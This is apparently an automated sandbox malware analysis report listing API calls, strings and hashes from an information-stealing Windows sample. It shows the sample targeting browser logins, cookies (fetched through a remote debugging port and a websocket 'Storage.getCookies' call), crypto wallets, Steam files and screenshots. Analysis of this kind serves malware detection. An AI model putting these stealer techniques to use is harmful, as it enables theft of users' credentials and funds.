                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(StrCmpCW), ref: 00419275
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(PathMatchSpecA), ref: 0041928B
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(76470000,GetModuleFileNameExA), ref: 004192A5
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(6ED50000,RmStartSession), ref: 004192BF
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(RmRegisterResources), ref: 004192D5
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(RmGetList), ref: 004192EB
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(RmEndSession), ref: 00419301
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(6D4D0000,SymMatchString), ref: 0041931B
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                • String ID: BCryptCloseAlgorithmProvider$BCryptDecrypt$BCryptDestroyKey$BCryptGenerateSymmetricKey$BCryptOpenAlgorithmProvider$BCryptSetProperty$BitBlt$CharToOemW$CloseWindow$CoCreateInstance$CoInitialize$CoUninitialize$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateFileA$CreateProcessA$CreateStreamOnHGlobal$CreateToolhelp32Snapshot$CryptBinaryToStringA$CryptUnprotectData$DeleteFileA$DeleteObject$EnumDisplayDevicesA$FindClose$FindFirstFileA$FindNextFileA$FreeLibrary$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipFree$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetCurrentProcessId$GetDC$GetDesktopWindow$GetEnvironmentVariableA$GetFileAttributesA$GetFileSize$GetFileSizeEx$GetHGlobalFromStream$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalProcessorInformationEx$GetModuleFileNameA$GetModuleFileNameExA$GetSystemPowerStatus$GetThreadContext$GetTimeZoneInformation$GetUserDefaultLocaleName$GetVolumeInformationA$GetWindowRect$GetWindowsDirectoryA$GlobalAlloc$GlobalFree$GlobalLock$GlobalSize$HeapFree$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetCrackUrlA$InternetOpenA$InternetOpenUrlA$InternetReadFile$InternetSetOptionA$IsWow64Process$LocalAlloc$LocalFree$MultiByteToWideChar$OpenProcess$PathMatchSpecA$Process32First$Process32Next$ReadProcessMemory$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA$ResumeThread$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$SHGetFolderPathA$SelectObject$SetEnvironmentVariableA$SetFilePointer$SetThreadContext$ShellExecuteExA$StrCmpCA$StrCmpCW$StrStrA$SymMatchString$TerminateProcess$VirtualAllocEx$VirtualProtect$WideCharToMultiByte$WriteFile$WriteProcessMemory$bcrypt.dll$dbghelp.dll$gdiplus.dll$lstrcpynA$ole32.dll$psapi.dll$rstrtmgr.dll$shell32.dll$shlwapi.dll$wininet.dll$wsprintfA$wsprintfW
                                                                                                                                                                                                                                                                                • API String ID: 2238633743-859426583
                                                                                                                                                                                                                                                                                • Opcode ID: e334bc535a13e97accdcf64ac2a3aa2131f507ae42f1c63ed7f53eac5600871f
                                                                                                                                                                                                                                                                                • Instruction ID: 0a0f86706a4d50df5c0891041486815c3a2fdb24875638c890ef6a63e7135bce
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e334bc535a13e97accdcf64ac2a3aa2131f507ae42f1c63ed7f53eac5600871f
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0032D6B0A41B50AFD7116F61FD06B257AA3FB85705354603BB802972B2DBBA1850EFD8
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memcpy.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 004024B6
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040ED20: memcpy.MSVCRT(00000000,?,0000000F,00000000,-00000001,77735E70,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDD8
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,ws://,00000005,?,00000000,00000005), ref: 00405594
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000005), ref: 004055FD
                                                                                                                                                                                                                                                                                • memchr.MSVCRT ref: 00405644
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000005,-00000005), ref: 0040570A
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000005,000000FF,?,00000000,00000005), ref: 004057D4
                                                                                                                                                                                                                                                                                • memchr.MSVCRT ref: 00405814
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000001,000000FF), ref: 004058DA
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,?,00000001,000000FF), ref: 0040595E
                                                                                                                                                                                                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 00405993
                                                                                                                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 004059AE
                                                                                                                                                                                                                                                                                • getaddrinfo.WS2_32(00000000,00000000,?,00000000), ref: 00405A18
                                                                                                                                                                                                                                                                                • closesocket.WS2_32(?), ref: 00405A2A
                                                                                                                                                                                                                                                                                • WSACleanup.WS2_32 ref: 00405A30
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405AA0
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405AF3
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000,?,00000000,00000005), ref: 00405B46
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040ED20: memmove.MSVCRT(?,00000000,?,00000000,-00000001,77735E70,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDA3
                                                                                                                                                                                                                                                                                  • Part of subcall function 00406940: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,0040D83E,00000000,?,00000000), ref: 00406982
                                                                                                                                                                                                                                                                                  • Part of subcall function 00406940: memmove.MSVCRT(?,?,?,00000000,?,0040D83E,00000000,?,00000000), ref: 004069AA
                                                                                                                                                                                                                                                                                • htons.WS2_32(00000000), ref: 00405B76
                                                                                                                                                                                                                                                                                • freeaddrinfo.WS2_32(00000000), ref: 00405B96
                                                                                                                                                                                                                                                                                • connect.WS2_32(?,00000002,00000010), ref: 00405BAB
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,?,GET ,00000000,00420ACE,00000001), ref: 00405C38
                                                                                                                                                                                                                                                                                • closesocket.WS2_32(?), ref: 00405C45
                                                                                                                                                                                                                                                                                • WSACleanup.WS2_32 ref: 00405C4B
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405CC2
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405D29
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405D95
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405DFC
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE), ref: 00405E6D
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE), ref: 00405EE6
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405F75
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405FE3
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 0040604B
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 004060AD
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 0040610F
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00406171
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 004061D9
                                                                                                                                                                                                                                                                                • send.WS2_32(00000000,00000000,?,00000000), ref: 0040620B
                                                                                                                                                                                                                                                                                • recv.WS2_32(00000000,?,00001000,00000000), ref: 0040622A
                                                                                                                                                                                                                                                                                • rand.MSVCRT ref: 00406246
                                                                                                                                                                                                                                                                                • rand.MSVCRT ref: 00406252
                                                                                                                                                                                                                                                                                • rand.MSVCRT ref: 0040625E
                                                                                                                                                                                                                                                                                • rand.MSVCRT ref: 0040626A
                                                                                                                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 004062E7
                                                                                                                                                                                                                                                                                • WSACleanup.WS2_32 ref: 004062ED
                                                                                                                                                                                                                                                                                  • Part of subcall function 00406B00: memcpy.MSVCRT(00000000,?,?,00000000,?,?,?,00000000,?,?,?,00406742,00000088,0042150A,00000000,?), ref: 00406B7A
                                                                                                                                                                                                                                                                                • send.WS2_32(00000000,00000000,00000000,00000000), ref: 004063F3
                                                                                                                                                                                                                                                                                • recv.WS2_32(00000000,00000000,00001000,00000000), ref: 00406465
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,00000000), ref: 004064A3
                                                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(?), ref: 004065BF
                                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0042150A,00000000,?,00000000,00000005), ref: 0040671B
                                                                                                                                                                                                                                                                                • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00406763
                                                                                                                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 0040676A
                                                                                                                                                                                                                                                                                • WSACleanup.WS2_32 ref: 00406770
                                                                                                                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 004067C8
                                                                                                                                                                                                                                                                                • WSACleanup.WS2_32 ref: 004067CE
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040683D
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406894
                                                                                                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 0040692E
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                • {"id":1,"method":"Storage.getCookies"}, xrefs: 0040623C
                                                                                                                                                                                                                                                                                • GET , xrefs: 00405BFC
                                                                                                                                                                                                                                                                                • Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 00405DCF
                                                                                                                                                                                                                                                                                • ws://, xrefs: 0040558E
                                                                                                                                                                                                                                                                                • Sec-WebSocket-Version: 13, xrefs: 00405EB3
                                                                                                                                                                                                                                                                                • HTTP/1.1Host: , xrefs: 00405C0B
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ??3@$memcpy$Cleanupclosesocket$rand$memmovesend$memchrrecv$??2@Concurrency::cancel_current_taskStartup_invalid_parameter_noinfo_noreturnconnectfreeaddrinfogetaddrinfohtonsmemcmpsocket
                                                                                                                                                                                                                                                                                • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $GET $ws://${"id":1,"method":"Storage.getCookies"}
                                                                                                                                                                                                                                                                                • API String ID: 2888708447-1943833848

Control-flow Graph (graph not reproduced; legend: Executed / Not Executed; entry block 4081b0-408273)
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104), ref: 004081D9
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,0042150A,0042150A,?,?,0042119A,?,?,0042150A,?), ref: 00408268
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 00408311
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00408344
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040839B
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 004083CC
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040842F
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpy$lstrcatlstrlenmemcmpstrlen$??3@EnvironmentExpandFileFindFirstStringsmemmove
                                                                                                                                                                                                                                                                                • String ID: --remote-debugging-port=9223 --profile-directory="$Brave$C:\ProgramData\$CURRENT$Cookies$History$IndexedDB$Local Extension Settings$Login Data$Network$Opera$Opera Crypto$Opera GX$Sync Extension Settings$Wallets$Web Data$\BraveWallet\Preferences$_0.indexeddb.leveldb$_cookies.db$_formhistory.db$_history.db$_key4.db$_logins.json$_webdata.db$chrome-extension_$cookies.sqlite$formhistory.sqlite$places.sqlite
                                                                                                                                                                                                                                                                                • API String ID: 664854069-3644845557
                                                                                                                                                                                                                                                                                • Opcode ID: 8c4c13cee421c7050bc34002db25b6abb8c2bc4e772ac01028f81aeeca01f54a
                                                                                                                                                                                                                                                                                • Instruction ID: 4855d12272032d1875a7082c41d92aaf51c32be0ad940928e656d1a7aac375ca
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c4c13cee421c7050bc34002db25b6abb8c2bc4e772ac01028f81aeeca01f54a
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0FB2A331A006199BCB10EFA1CD95AEEB779BF48304F40419EF8056B192DF78AEC5CB95

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00414012
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?,-000000C0,-000000CC,-000000D8), ref: 00414023
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00414039
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0041404F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 004140E5
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(?,00000000,00000000), ref: 0041412B
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 00414197
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002), ref: 004141D4
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002), ref: 0041423D
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: memcmpmemsetstrlen$??3@FileFindFirstmemmovewsprintf
                                                                                                                                                                                                                                                                                • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$%s\%s\%s$%s\*.*$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$C:\ProgramData\$Files
                                                                                                                                                                                                                                                                                • API String ID: 330858031-1484801792
                                                                                                                                                                                                                                                                                • Opcode ID: 85359c954f35e407cbf01df20d7615a727ed75f97d4295e79f40369c1520ae8c
                                                                                                                                                                                                                                                                                • Instruction ID: 5e360f460fbcca21e162eb574f6fd90f09ecfb201c8315115846ffce7b56cf4e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85359c954f35e407cbf01df20d7615a727ed75f97d4295e79f40369c1520ae8c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB42D471E00618ABDB10DF65CC85BEEB7B4BF58304F00419AF915A7252EB78AAC4CF94

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00414BEE
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00414BFF
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 00414CA9
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00414CEB
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 00414D57
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00414D94
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 00414DFD
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: memcmpstrlen$??3@FileFindFirstmemmovewsprintf
                                                                                                                                                                                                                                                                                • String ID: %s\%s$Soft$Software\Valve\Steam$SteamPath$\Steam\$\config\
                                                                                                                                                                                                                                                                                • API String ID: 3353021899-493467598
                                                                                                                                                                                                                                                                                • Opcode ID: e8913cc1306ead9757348380cdc05cbb35dee01de83e02b5b92843a6cff9921b
                                                                                                                                                                                                                                                                                • Instruction ID: f04b4360dc0817d558250c3cdd1667f1ca9511f4c4837c2270bb77207d21b6f3
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8913cc1306ead9757348380cdc05cbb35dee01de83e02b5b92843a6cff9921b
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1132B531C007589BDF10EF65CD85AEDB778BF58304F00929AF90967152EB78AAC5CB94

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040708A
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040ECA0: memcpy.MSVCRT(?,00000010,?,?,?,00000010,00406A4D,00000001,00000000,?,?,00000000,00000000,00000000,?,0040D83E), ref: 0040ECC1
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040ECA0: ??3@YAXPAX@Z.MSVCRT(00000010,?,?,00000010,00406A4D,00000001,00000000,?,?,00000000,00000000,00000000,?,0040D83E,00000000,?), ref: 0040ECF3
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 004070EB
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,ChromeBuildTools,00000104), ref: 00407130
                                                                                                                                                                                                                                                                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00407142
                                                                                                                                                                                                                                                                                • CreateDesktopA.USER32 ref: 00407166
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,OCALAPPDATA,00000000,?,0000001C), ref: 004071BD
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 00407222
                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,00000000,00000000,?,00000000,?), ref: 0040725B
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: strlen$Desktopmemcpy$??3@CreateOpenSleeplstrcpy
                                                                                                                                                                                                                                                                                • String ID: %s%s"$ChromeBuildTools$D$OCALAPPDATA$_CreateProcess$cookies
                                                                                                                                                                                                                                                                                • API String ID: 509579932-957743217
                                                                                                                                                                                                                                                                                • Opcode ID: 25b604c1d987f4309f2292e5dfc1b2e03b5b8293f16c39f96c9129eb1a5b4d54
                                                                                                                                                                                                                                                                                • Instruction ID: 88d1e3b40fbcb0df37290dc8620aa57b8ac853b7570111a731a950e539c68a8a
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25b604c1d987f4309f2292e5dfc1b2e03b5b8293f16c39f96c9129eb1a5b4d54
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69F1F431D046049BDB11EF64CD81BEEB7B0AF45304F00456EF90677292EB79A9C5CB9A

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,00000028,00000028,00000028,P#@,?,00420BBE,?,?,?,00420BBE,P#@,?,00000028,00000028,?), ref: 004018D4
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 00401970
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: FileFindFirstlstrcpystrlen
                                                                                                                                                                                                                                                                                • String ID: C:\ProgramData\$P#@$P#@$Wallets$\*.*
                                                                                                                                                                                                                                                                                • API String ID: 2655114730-2645412951
                                                                                                                                                                                                                                                                                • Opcode ID: 0392e0cbbb74c3f63e79c827141e62e095c897f05b3910d11131e3b73294b9ba
                                                                                                                                                                                                                                                                                • Instruction ID: f6b8f89bdbb38ad25dbe9b200cedc7393f8838c2c48d913623183ff2efa6fcc7
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0392e0cbbb74c3f63e79c827141e62e095c897f05b3910d11131e3b73294b9ba
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C572B931A102185BCF14EBA1CD959EEB779AF44304F40409EF9066B192DF7CAEC5CBA9
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
